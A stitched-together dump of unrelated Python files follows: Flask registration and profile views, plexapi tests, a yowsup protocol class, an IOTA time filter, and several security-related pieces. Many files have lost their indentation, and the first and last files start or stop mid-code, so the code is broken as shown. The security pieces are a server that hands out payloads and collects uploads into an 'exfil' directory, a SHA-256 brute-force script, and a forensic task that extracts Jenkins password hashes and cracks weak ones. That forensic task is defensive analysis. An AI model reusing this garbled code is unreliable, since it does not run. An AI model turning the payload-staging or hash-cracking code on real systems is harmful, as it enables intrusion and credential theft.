instructionalVideo = mapc.getConfiguration('QualTest_InstructionalVideo')
instructionalWidth = mapc.getConfiguration('QualTest_InstructionalVideoWidth')
instructionalHeight = mapc.getConfiguration('QualTest_InstructionalVideoHeight')
introUrl = "%s/%s" % (videoUrl, introVideo)
instructionalUrl = "%s/%s" % (videoUrl, instructionalVideo)
# Load up the training form.
trainingForm.introUrl.data = introUrl
trainingForm.introWidth.data = introWidth
trainingForm.introHeight.data = introHeight
trainingForm.instructionalUrl.data = instructionalUrl
trainingForm.instructionalWidth.data = instructionalWidth
trainingForm.instructionalHeight.data = instructionalHeight
return render_template('pages/training_page.html', form=trainingForm)
# ----------------------------------------------------------------
# The registration page is accessible by invitation only.
def register():
""" Display registration form and create new User."""
user_manager = current_app.user_manager
db_adapter = user_manager.db_adapter
safe_next = _get_safe_next_param('next', user_manager.after_login_endpoint)
safe_reg_next = _get_safe_next_param('reg_next', user_manager.after_register_endpoint)
    # The invite token determines whether the registrant was actually invited.
    invite_token = request.values.get("token")
    # If invitations are required and no token was supplied, block registration.
if user_manager.require_invitation and not invite_token:
flash("Registration is invite only", "error")
return redirect(url_for('user.login'))
user_invite = None
if invite_token and db_adapter.UserInvitationClass:
user_invite = db_adapter.find_first_object(db_adapter.UserInvitationClass, token=invite_token)
if user_invite is None:
flash("Invalid invitation token", "error")
return redirect(url_for('user.login'))
# Initialize form
login_form = user_manager.login_form() # for login_or_register.html
if user_invite.role == 'admin':
register_form = AdminRegisterForm(request.form)
elif user_invite.role == 'employer':
register_form = EmployerRegisterForm(request.form)
elif user_invite.role == 'employee':
register_form = EmployeeRegisterForm(request.form)
if user_invite:
register_form.invite_token.data = invite_token
if request.method!='POST':
login_form.next.data = register_form.next.data = safe_next
login_form.reg_next.data = register_form.reg_next.data = safe_reg_next
if user_invite:
register_form.email.data = user_invite.email
if hasattr(db_adapter.UserInvitationClass, 'role'):
register_form.role.data = user_invite.role
# Process valid POST
if request.method=='POST' and register_form.validate():
# Create a User object using Form fields that have a corresponding User field
User = db_adapter.UserClass
user_class_fields = User.__dict__
user_fields = {}
# Create a UserEmail object using Form fields that have a corresponding UserEmail field
if db_adapter.UserEmailClass:
UserEmail = db_adapter.UserEmailClass
user_email_class_fields = UserEmail.__dict__
user_email_fields = {}
# Create a UserAuth object using Form fields that have a corresponding UserAuth field
if db_adapter.UserAuthClass:
UserAuth = db_adapter.UserAuthClass
user_auth_class_fields = UserAuth.__dict__
user_auth_fields = {}
Role = db_adapter.RoleClass
role_class_fields = Role.__dict__
role_fields = {}
# Enable user account
if db_adapter.UserProfileClass:
if hasattr(db_adapter.UserProfileClass, 'active'):
user_auth_fields['active'] = True
elif hasattr(db_adapter.UserProfileClass, 'is_enabled'):
user_auth_fields['is_enabled'] = True
else:
user_auth_fields['is_active'] = True
else:
if hasattr(db_adapter.UserClass, 'active'):
user_fields['active'] = True
elif hasattr(db_adapter.UserClass, 'is_enabled'):
user_fields['is_enabled'] = True
else:
user_fields['is_active'] = True
# For all form fields
role = None
for field_name, field_value in register_form.data.items():
# Hash password field
if field_name=='password':
hashed_password = user_manager.hash_password(field_value)
if db_adapter.UserAuthClass:
user_auth_fields['password'] = hashed_password
else:
user_fields['password'] = hashed_password
elif field_name == 'role':
role = Role.query.filter(Role.name == field_value).first()
# Store corresponding Form fields into the User object and/or UserProfile object
else:
if field_name in user_class_fields:
user_fields[field_name] = field_value
if db_adapter.UserEmailClass:
if field_name in user_email_class_fields:
user_email_fields[field_name] = field_value
if db_adapter.UserAuthClass:
if field_name in user_auth_class_fields:
user_auth_fields[field_name] = field_value
if user_invite:
user_fields['invited_by'] = user_invite.invited_by
# Add User record using named arguments 'user_fields'
user = db_adapter.add_object(User, **user_fields)
        if role:
user.roles.append(role)
if db_adapter.UserProfileClass:
user_profile = user
# Add UserEmail record using named arguments 'user_email_fields'
if db_adapter.UserEmailClass:
user_email = db_adapter.add_object(UserEmail,
user=user,
is_primary=True,
**user_email_fields)
else:
user_email = None
# Add UserAuth record using named arguments 'user_auth_fields'
if db_adapter.UserAuthClass:
user_auth = db_adapter.add_object(UserAuth, **user_auth_fields)
if db_adapter.UserProfileClass:
user = user_auth
else:
user.user_auth = user_auth
require_email_confirmation = True
if user_invite:
if user_invite.email == register_form.email.data:
require_email_confirmation = False
db_adapter.update_object(user, confirmed_at=datetime.utcnow())
# Clear token so invite can only be used once.
user_invite.token = None
db_adapter.commit()
# Send 'registered' email and delete new User object if send fails
if user_manager.send_registered_email:
try:
# Send 'registered' email
_send_registered_email(user, user_email, require_email_confirmation)
except Exception as e:
# delete new User object if send fails
db_adapter.delete_object(user)
db_adapter.commit()
raise
# Send user_registered signal
signals.user_registered.send(current_app._get_current_object(),
user=user,
user_invite=user_invite)
# Redirect if USER_ENABLE_CONFIRM_EMAIL is set
if user_manager.enable_confirm_email and require_email_confirmation:
safe_reg_next = user_manager.make_safe_url_function(register_form.reg_next.data)
return redirect(safe_reg_next)
# Auto-login after register or redirect to login page
if 'reg_next' in request.args:
safe_reg_next = user_manager.make_safe_url_function(register_form.reg_next.data)
else:
safe_reg_next = _endpoint_url(user_manager.after_confirm_endpoint)
if user_manager.auto_login_after_register:
return _do_login_user(user, safe_reg_next) # auto-login
else:
return redirect(url_for('user.login')+'?next='+quote(safe_reg_next)) # redirect to login page
# Process GET or invalid POST
return render(user_manager.register_template,
form=register_form,
login_form=login_form,
register_form=register_form)
# ----------------------------------------------------------------
@main_blueprint.route('/user/profile', methods=['GET', 'POST'])
@login_required
def user_profile():
# Initialize form
if current_user.has_role('admin'):
form = AdminProfileForm(request.form)
elif current_user.has_role('employer'):
form = EmployerProfileForm(request.form)
elif current_user.has_role('employee'):
form = EmployeeProfileForm(request.form)
# Process valid POST
if request.method == 'POST' and form.validate():
# Copy form fields to user_profile fields
form.populate_obj(current_user)
# Save user_profile
db.session.commit()
# Redirect to user_profile page
return redirect(url_for('main.user_profile'))
# Process GET or invalid POST
return render_template('pages/user_profile_page.html', form=form)
# ----------------------------------------------------------------
@main_blueprint.route('/select_role_page')
@login_required
def select_role_page():
if current_user.has_role('admin'):
return redirect(url_for('main.admin_page'))
elif current_user.has_role('employer'):
return redirect(url_for('main.employer_page'))
elif current_user.has_role('employee'):
return redirect(url_for('main.employee_page'))
return redirect(url_for('main.home_page'))
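# Minimal wiring sketch (hedged): the blueprint above is meant to be registered
# by an app factory. The factory name below is an assumption, and the custom
# register() view still has to be hooked into flask_user's UserManager
# separately; this only shows the blueprint registration step.
#
# from flask import Flask
#
# def create_app():
#     app = Flask(__name__)
#     app.register_blueprint(main_blueprint)
#     return app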
|
"""
UnionFind disjoint sets data structure.
"""
from . import unionfind
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@File : __init__.py.py
@Time : 2020/3/27 22:36
@Author : Empty Chan
@Contact : chen19941018@gmail.com
@Description:
@License : (C) Copyright 2016-2020, iFuture Corporation Limited.
"""
from . import *
|
# -*- coding: utf-8 -*-
import pytest
from plexapi.exceptions import BadRequest, NotFound
from . import conftest as utils
def test_myplex_accounts(account, plex):
assert account, "Must specify username, password & resource to run this test."
print("MyPlexAccount:")
print("username: %s" % account.username)
print("email: %s" % account.email)
print("home: %s" % account.home)
print("queueEmail: %s" % account.queueEmail)
assert account.username, "Account has no username"
assert account.authenticationToken, "Account has no authenticationToken"
assert account.email, "Account has no email"
assert account.home is not None, "Account has no home"
assert account.queueEmail, "Account has no queueEmail"
account = plex.account()
print("Local PlexServer.account():")
print("username: %s" % account.username)
# print('authToken: %s' % account.authToken)
print("signInState: %s" % account.signInState)
assert account.username, "Account has no username"
assert account.authToken, "Account has no authToken"
assert account.signInState, "Account has no signInState"
def test_myplex_resources(account):
assert account, "Must specify username, password & resource to run this test."
resources = account.resources()
for resource in resources:
name = resource.name or "Unknown"
connections = [c.uri for c in resource.connections]
connections = ", ".join(connections) if connections else "None"
print("%s (%s): %s" % (name, resource.product, connections))
assert resources, "No resources found for account: %s" % account.name
def test_myplex_connect_to_resource(plex, account):
servername = plex.friendlyName
for resource in account.resources():
if resource.name == servername:
break
assert resource.connect(timeout=10)
def test_myplex_devices(account):
devices = account.devices()
for device in devices:
name = device.name or "Unknown"
connections = ", ".join(device.connections) if device.connections else "None"
print("%s (%s): %s" % (name, device.product, connections))
assert devices, "No devices found for account: %s" % account.name
def test_myplex_device(account, plex):
assert account.device(plex.friendlyName)
def _test_myplex_connect_to_device(account):
devices = account.devices()
for device in devices:
if device.name == "some client name" and len(device.connections):
break
client = device.connect()
assert client, "Unable to connect to device"
def test_myplex_users(account):
users = account.users()
if not len(users):
return pytest.skip("You have to add a shared account into your MyPlex")
print("Found %s users." % len(users))
user = account.user(users[0].title)
print("Found user: %s" % user)
assert user, "Could not find user %s" % users[0].title
assert (
len(users[0].servers[0].sections()) > 0
), "Couldn't info about the shared libraries"
def test_myplex_resource(account, plex):
assert account.resource(plex.friendlyName)
def test_myplex_webhooks(account):
if account.subscriptionActive:
assert isinstance(account.webhooks(), list)
else:
with pytest.raises(BadRequest):
account.webhooks()
def test_myplex_addwebhooks(account):
if account.subscriptionActive:
assert "http://example.com" in account.addWebhook("http://example.com")
else:
with pytest.raises(BadRequest):
account.addWebhook("http://example.com")
def test_myplex_deletewebhooks(account):
if account.subscriptionActive:
assert "http://example.com" not in account.deleteWebhook("http://example.com")
else:
with pytest.raises(BadRequest):
account.deleteWebhook("http://example.com")
def test_myplex_optout(account_once):
def enabled():
ele = account_once.query("https://plex.tv/api/v2/user/privacy")
lib = ele.attrib.get("optOutLibraryStats")
play = ele.attrib.get("optOutPlayback")
return bool(int(lib)), bool(int(play))
account_once.optOut(library=True, playback=True)
utils.wait_until(lambda: enabled() == (True, True))
account_once.optOut(library=False, playback=False)
utils.wait_until(lambda: enabled() == (False, False))
@pytest.mark.authenticated
@pytest.mark.xfail(reason="Test account is missing online media sources?")
def test_myplex_onlineMediaSources_optOut(account):
onlineMediaSources = account.onlineMediaSources()
for optOut in onlineMediaSources:
if optOut.key == 'tv.plex.provider.news':
# News is no longer available
continue
optOutValue = optOut.value
optOut.optIn()
assert optOut.value == 'opt_in'
optOut.optOut()
assert optOut.value == 'opt_out'
if optOut.key == 'tv.plex.provider.music':
with pytest.raises(BadRequest):
optOut.optOutManaged()
else:
optOut.optOutManaged()
assert optOut.value == 'opt_out_managed'
# Reset original value
optOut._updateOptOut(optOutValue)
with pytest.raises(NotFound):
onlineMediaSources[0]._updateOptOut('unknown')
def test_myplex_inviteFriend_remove(account, plex, mocker):
inv_user = "hellowlol"
vid_filter = {"contentRating": ["G"], "label": ["foo"]}
secs = plex.library.sections()
ids = account._getSectionIds(plex.machineIdentifier, secs)
mocker.patch.object(account, "_getSectionIds", return_value=ids)
with utils.callable_http_patch():
account.inviteFriend(
inv_user,
plex,
secs,
allowSync=True,
allowCameraUpload=True,
allowChannels=False,
filterMovies=vid_filter,
filterTelevision=vid_filter,
filterMusic={"label": ["foo"]},
)
assert inv_user not in [u.title for u in account.users()]
with pytest.raises(NotFound):
with utils.callable_http_patch():
account.removeFriend(inv_user)
def test_myplex_updateFriend(account, plex, mocker, shared_username):
vid_filter = {"contentRating": ["G"], "label": ["foo"]}
secs = plex.library.sections()
user = account.user(shared_username)
ids = account._getSectionIds(plex.machineIdentifier, secs)
mocker.patch.object(account, "_getSectionIds", return_value=ids)
mocker.patch.object(account, "user", return_value=user)
with utils.callable_http_patch():
account.updateFriend(
shared_username,
plex,
secs,
allowSync=True,
removeSections=True,
allowCameraUpload=True,
allowChannels=False,
filterMovies=vid_filter,
filterTelevision=vid_filter,
filterMusic={"label": ["foo"]},
)
def test_myplex_createExistingUser(account, plex, shared_username):
user = account.user(shared_username)
url = "https://plex.tv/api/invites/requested/{}?friend=0&server=0&home=1".format(
user.id
)
account.createExistingUser(user, plex)
assert shared_username in [u.username for u in account.users() if u.home is True]
# Remove Home invite
account.query(url, account._session.delete)
# Confirm user was removed from home and has returned to friend
assert shared_username not in [
u.username for u in plex.myPlexAccount().users() if u.home is True
]
assert shared_username in [
u.username for u in plex.myPlexAccount().users() if u.home is False
]
@pytest.mark.skip(reason="broken test?")
def test_myplex_createHomeUser_remove(account, plex):
homeuser = "New Home User"
account.createHomeUser(homeuser, plex)
assert homeuser in [u.title for u in plex.myPlexAccount().users() if u.home is True]
account.removeHomeUser(homeuser)
assert homeuser not in [
u.title for u in plex.myPlexAccount().users() if u.home is True
]
def test_myplex_plexpass_attributes(account_plexpass):
assert account_plexpass.subscriptionActive
assert account_plexpass.subscriptionStatus == "Active"
assert account_plexpass.subscriptionPlan
assert "sync" in account_plexpass.subscriptionFeatures
assert "premium_music_metadata" in account_plexpass.subscriptionFeatures
assert "plexpass" in account_plexpass.roles
assert utils.ENTITLEMENTS <= set(account_plexpass.entitlements)
def test_myplex_claimToken(account):
assert account.claimToken().startswith("claim-")
|
import os
import uuid
from aiohttp import web
from app.utility.logger import Logger
class FileSvc:
def __init__(self, payload_dirs, exfil_dir):
self.payload_dirs = payload_dirs
self.log = Logger('file_svc')
self.exfil_dir = exfil_dir
async def download(self, request):
name = request.headers.get('file')
file_path, headers = await self.find_file(name)
if file_path:
self.log.debug('downloading %s...' % name)
return web.FileResponse(path=file_path, headers=headers)
return web.HTTPNotFound(body='File not found')
async def find_file(self, name):
for store in self.payload_dirs:
for root, dirs, files in os.walk(store):
if name in files:
headers = dict([('CONTENT-DISPOSITION', 'attachment; filename="%s"' % name)])
return os.path.join(root, name), headers
return None, None
async def upload(self, request):
try:
reader = await request.multipart()
exfil_dir = await self._create_unique_exfil_sub_directory()
while True:
field = await reader.next()
if not field:
break
filename = field.filename
with open(os.path.join(exfil_dir, filename), 'wb') as f:
while True:
chunk = await field.read_chunk()
if not chunk:
break
f.write(chunk)
self.log.debug('Uploaded file %s' % filename)
return web.Response()
except Exception as e:
self.log.debug('Exception uploading file %s' % e)
""" PRIVATE """
async def _create_unique_exfil_sub_directory(self):
dir_name = str(uuid.uuid4())
path = os.path.join(self.exfil_dir, dir_name)
os.makedirs(path)
return path
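# Minimal wiring sketch (hedged): directories, routes, and port below are
# illustrative assumptions, not part of the original service.
#
# if __name__ == '__main__':
#     svc = FileSvc(payload_dirs=['payloads'], exfil_dir='/tmp/exfil')
#     app = web.Application()
#     app.router.add_get('/file/download', svc.download)
#     app.router.add_post('/file/upload', svc.upload)
#     web.run_app(app, port=8888)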
|
from yowsup.structs import ProtocolEntity, ProtocolTreeNode
class AckProtocolEntity(ProtocolEntity):
'''
<ack class="{{receipt | message | ?}}" id="{{message_id}}">
</ack>
'''
def __init__(self, _id, _class):
super(AckProtocolEntity, self).__init__("ack")
self._id = _id
self._class = _class
def getId(self):
return self._id
def getClass(self):
return self._class
def toProtocolTreeNode(self):
attribs = {
"id" : self._id,
"class" : self._class,
}
return self._createProtocolTreeNode(attribs, None, data = None)
def __str__(self):
out = "ACK:\n"
out += "ID: %s\n" % self._id
out += "Class: %s\n" % self._class
return out
@staticmethod
def fromProtocolTreeNode(node):
return AckProtocolEntity(
node.getAttributeValue("id"),
node.getAttributeValue("class")
)
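# Round-trip sketch (hedged; the id and class values are made-up examples):
#
# if __name__ == "__main__":
#     ack = AckProtocolEntity("1234-5678", "receipt")
#     node = ack.toProtocolTreeNode()
#     print(AckProtocolEntity.fromProtocolTreeNode(node))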
|
#!/usr/bin/env python3
import hashlib
def main():
print(hashlib.sha256("hugh,13145820,20193833".encode("ascii")).hexdigest())
# 13145820
guess_flag = True
digits = 1
while guess_flag:
bound = 10**digits
guess = 0
while guess < bound:
guess_str = ("hugh,{:0" + str(digits) +
"d},20193833").format(guess)
print(guess_str, end='\r')
result = hashlib.sha256(guess_str.encode("ascii")).hexdigest()
if result == "ee688ca24c201a27fcc94ebd46e87ae6a7c4f54b445fccfc0727a70332353f7f":
print("Right! %s" % guess)
guess_flag = False
break
guess += 1
digits += 1
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Task for analysing Jenkins."""
from __future__ import unicode_literals
import os
import re
from turbinia import TurbiniaException
from turbinia.evidence import ReportText
from turbinia.lib import text_formatter as fmt
from turbinia.workers import TurbiniaTask
from turbinia.workers import Priority
from turbinia.lib.utils import extract_files
from turbinia.lib.utils import bruteforce_password_hashes
class JenkinsAnalysisTask(TurbiniaTask):
"""Task to analyze a Jenkins install."""
def run(self, evidence, result):
"""Run the Jenkins worker.
Args:
evidence (Evidence object): The evidence to process
result (TurbiniaTaskResult): The object to place task results into.
Returns:
TurbiniaTaskResult object.
"""
# Where to store the resulting output file.
output_file_name = 'jenkins_analysis.txt'
output_file_path = os.path.join(self.output_dir, output_file_name)
# What type of evidence we should output.
output_evidence = ReportText(source_path=output_file_path)
# TODO(aarontp): We should find a more optimal solution for this because
# this requires traversing the entire filesystem and extracting more files
# than we need. Tracked in https://github.com/google/turbinia/issues/402
try:
collected_artifacts = extract_files(
file_name='config.xml', disk_path=evidence.local_path,
output_dir=os.path.join(self.output_dir, 'artifacts'))
except TurbiniaException as e:
result.close(self, success=False, status=str(e))
return result
jenkins_artifacts = []
jenkins_re = re.compile(r'^.*jenkins[^\/]*(\/users\/[^\/]+)*\/config\.xml$')
for collected_artifact in collected_artifacts:
if re.match(jenkins_re, collected_artifact):
jenkins_artifacts.append(collected_artifact)
version = None
credentials = []
for filepath in jenkins_artifacts:
with open(filepath, 'r') as input_file:
config = input_file.read()
extracted_version = self._extract_jenkins_version(config)
extracted_credentials = self._extract_jenkins_credentials(config)
if extracted_version:
version = extracted_version
credentials.extend(extracted_credentials)
(report, priority, summary) = self.analyze_jenkins(version, credentials)
output_evidence.text_data = report
result.report_data = report
result.report_priority = priority
# Write the report to the output file.
with open(output_file_path, 'wb') as fh:
fh.write(output_evidence.text_data.encode('utf8'))
fh.write('\n'.encode('utf8'))
# Add the resulting evidence to the result object.
result.add_evidence(output_evidence, evidence.config)
result.close(self, success=True, status=summary)
return result
@staticmethod
def _extract_jenkins_version(config):
"""Extract version from Jenkins configuration files.
Args:
config (str): configuration file content.
Returns:
str: The version of Jenkins.
"""
version = None
version_re = re.compile('<version>(.*)</version>')
version_match = re.search(version_re, config)
if version_match:
version = version_match.group(1)
return version
@staticmethod
def _extract_jenkins_credentials(config):
"""Extract credentials from Jenkins configuration files.
Args:
config (str): configuration file content.
Returns:
list: of tuples with username and password hash.
"""
credentials = []
password_hash_re = re.compile('<passwordHash>#jbcrypt:(.*)</passwordHash>')
username_re = re.compile('<fullName>(.*)</fullName>')
password_hash_match = re.search(password_hash_re, config)
username_match = re.search(username_re, config)
if username_match and password_hash_match:
username = username_match.group(1)
password_hash = password_hash_match.group(1)
credentials.append((username, password_hash))
return credentials
@staticmethod
def analyze_jenkins(version, credentials):
"""Analyses a Jenkins configuration.
Args:
version (str): Version of Jenkins.
credentials (list): of tuples with username and password hash.
Returns:
Tuple(
report_text(str): The report data
report_priority(int): The priority of the report (0 - 100)
summary(str): A summary of the report (used for task status)
)
"""
report = []
summary = ''
priority = Priority.LOW
credentials_registry = {hash: username for username, hash in credentials}
# TODO: Add timeout parameter when dynamic configuration is ready.
# Ref: https://github.com/google/turbinia/issues/244
weak_passwords = bruteforce_password_hashes(credentials_registry.keys())
if not version:
version = 'Unknown'
report.append(fmt.bullet('Jenkins version: {0:s}'.format(version)))
if weak_passwords:
priority = Priority.CRITICAL
summary = 'Jenkins analysis found potential issues'
report.insert(0, fmt.heading4(fmt.bold(summary)))
line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
report.append(fmt.bullet(fmt.bold(line)))
for password_hash, plaintext in weak_passwords:
line = 'User "{0:s}" with password "{1:s}"'.format(
credentials_registry.get(password_hash), plaintext)
report.append(fmt.bullet(line, level=2))
elif credentials_registry or version != 'Unknown':
summary = (
'Jenkins version {0:s} found with {1:d} credentials, but no issues '
'detected'.format(version, len(credentials_registry)))
report.insert(0, fmt.heading4(summary))
priority = Priority.MEDIUM
else:
summary = 'No Jenkins instance found'
report.insert(0, fmt.heading4(summary))
report = '\n'.join(report)
return (report, priority, summary)
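# Standalone sketch of the reporting logic (hedged): the version string and the
# credential tuple are illustrative placeholders, and running this still needs
# the turbinia helper modules imported above to be installed.
#
# if __name__ == '__main__':
#     report, priority, summary = JenkinsAnalysisTask.analyze_jenkins(
#         '2.121.1', [('admin', '$2a$10$examplehashexamplehashexampleha')])
#     print(summary)
#     print(report)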
|
from typing import Callable
from datetime import datetime, timezone
from time import mktime
from ..common.const import (
MILESTONES_USING_TIMESTAMP_ONLY,
TIMESTAMP_B,
TIMESTAMP_E,
ATCH_TIMESTAMP_B,
ATCH_TIMESTAMP_E
)
from ..common import tryte_to_int
import logging
__all__ = [
'TimeFilter',
]
class TimeFilter():
"""
    Time filter for transactions
Attributes
----------
min : int
The private earliest Unix epoch time for filtering
max : int
The private latest Unix epoch time for filtering
Methods
-------
make_filter()
Return the built time filter
"""
def __init__(self, start_date: str, end_date: str) -> None:
"""
Parameters
----------
start_date : str
The start_date (%Y%m%d) of transaction to monitor (e.g., "20200101")
end_date : str
The end_date (%Y%m%d) of transaction to monitor (e.g., "20200201")
"""
try:
self._min = mktime(datetime.strptime(
start_date, "%Y%m%d").timetuple())
self._max = mktime(datetime.strptime(
end_date, "%Y%m%d").timetuple())
except:
logging.error("Dates {} and {} are not supported!".format(
start_date, end_date))
logging.error("Plese use \"%Y%m%d\" instead, e.g., \"20200101\"")
    def _get_transaction_dmp(self, timestamp: int, attachment_timestamp: int, milestone: str) -> int:
        if milestone in MILESTONES_USING_TIMESTAMP_ONLY:
            return timestamp
        if attachment_timestamp != 0:
            return attachment_timestamp/1000
        else:
            return timestamp
    def _get_transaction_time(self, timestamp: int, attachment_timestamp: int) -> int:
        if attachment_timestamp != 0:
            return attachment_timestamp/1000
        else:
            return timestamp
def _time_range_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t < self._max and t > self._min
except:
logging.error(
"Objects for time filtering (min<time<max) do not have time item!")
def _time_filter_larger_than_min(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t > self._min
except:
logging.error(
"Objects for time filtering (time>min) do not have time item!")
def _time_filter_smaller_than_max(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t < self._max
except:
logging.error(
"Objects for smaller time filtering (time<max) do not have time item!")
def _time_euqal_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t == self._min
except:
logging.error(
"Objects for time filtering (time=min) do not have time item!")
def _time_range_with_euqal_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t <= self._max and t >= self._min
except:
logging.error(
"Objects for time filtering (min<=time<=max) do not have time item!")
def _time_filter_equal_to_or_larger_than_min(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t >= self._min
except:
logging.error(
"Objects for time filtering (time>=min) do not have time item!")
def _time_filter_equal_to_or_smaller_than_max(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t <= self._max
except:
logging.error(
"Objects for smaller time filtering (time<=max) do not have time item!")
def _dmptime_range_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t < self._max and t > self._min
except:
logging.error(
"Objects for time filtering (min<time<max) do not have time item!")
def _dmptime_filter_larger_than_min_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t > self._min
except:
logging.error(
"Objects for time filtering (time>min) do not have time item!")
def _dmptime_filter_smaller_than_max_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t < self._max
except:
logging.error(
"Objects for smaller time filtering (time<max) do not have time item!")
def _dmptime_euqal_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t == self._min
except:
logging.error(
"Objects for time filtering (time=min) do not have time item!")
def _dmptime_range_with_euqal_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t <= self._max and t >= self._min
except:
logging.error(
"Objects for time filtering (min<=time<=max) do not have time item!")
def _dmptime_filter_equal_to_or_larger_than_min_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t >= self._min
except:
logging.error(
"Objects for time filtering (time>=min) do not have time item!")
def _dmptime_filter_equal_to_or_smaller_than_max_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t <= self._max
except:
logging.error(
"Objects for smaller time filtering (time<=max) do not have time item!")
def _time_range_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t < self._max and t > self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_larger_than_min_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t > self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_smaller_than_max_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t < self._max
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_euqal_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t == self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_range_with_euqal_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t <= self._max and t >= self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_equal_to_or_larger_than_min_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t >= self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_equal_to_or_smaller_than_max_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t <= self._max
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def make_filter(self, range_larger_smaller='R') -> Callable:
"""time filter generation function.
Parameters
----------
        range_larger_smaller (str) :
'R' for min < time < max
'm' for time > min
'M' for time < max
'E' for time = min
'RE' for min <= time <= max
'mE' for time >= min
'ME' for time <= max
Returns
----------
The built time filter.
"""
if range_larger_smaller == 'R':
return self._time_range_filter_str
elif range_larger_smaller == 'm':
return self._time_filter_larger_than_min_str
elif range_larger_smaller == 'M':
return self._time_filter_smaller_than_max_str
elif range_larger_smaller == 'E':
return self._time_euqal_filter_str
elif range_larger_smaller == 'RE':
return self._time_range_with_euqal_filter_str
elif range_larger_smaller == 'mE':
return self._time_filter_equal_to_or_larger_than_min_str
elif range_larger_smaller == 'ME':
return self._time_filter_equal_to_or_smaller_than_max_str
else:
raise ValueError(
"{} is not supported!".format(range_larger_smaller))
def make_dmp_filter(self, range_larger_smaller='R') -> Callable:
"""time filter generation function for dmp data.
When using this filter, the milestone for each transaction should be indicated.
Parameters
----------
        range_larger_smaller (str) :
'R' for min < time < max
'm' for time > min
'M' for time < max
'E' for time = min
'RE' for min <= time <= max
